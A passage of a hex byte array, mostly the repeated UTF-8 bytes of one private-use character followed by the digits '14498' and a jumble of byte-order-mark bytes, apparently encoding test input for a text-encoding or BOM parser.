0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0x31, 0x34, 0x34, 0x39, 0x38, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,\n0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe,\n0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xff,\n0xef, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef,\n0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe,\n0xff, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,\n0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xff,\n0xef, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe,\n0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe,\n0xff, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xfe,\n0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef,\n0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,\n0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe,\n0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff,\n0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xfe,\n0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe,\n0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe,\n0xff, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xff,\n0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xff,\n0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xff, 0xef,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,\n0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe,\n0xff, 0xff, 0xef, 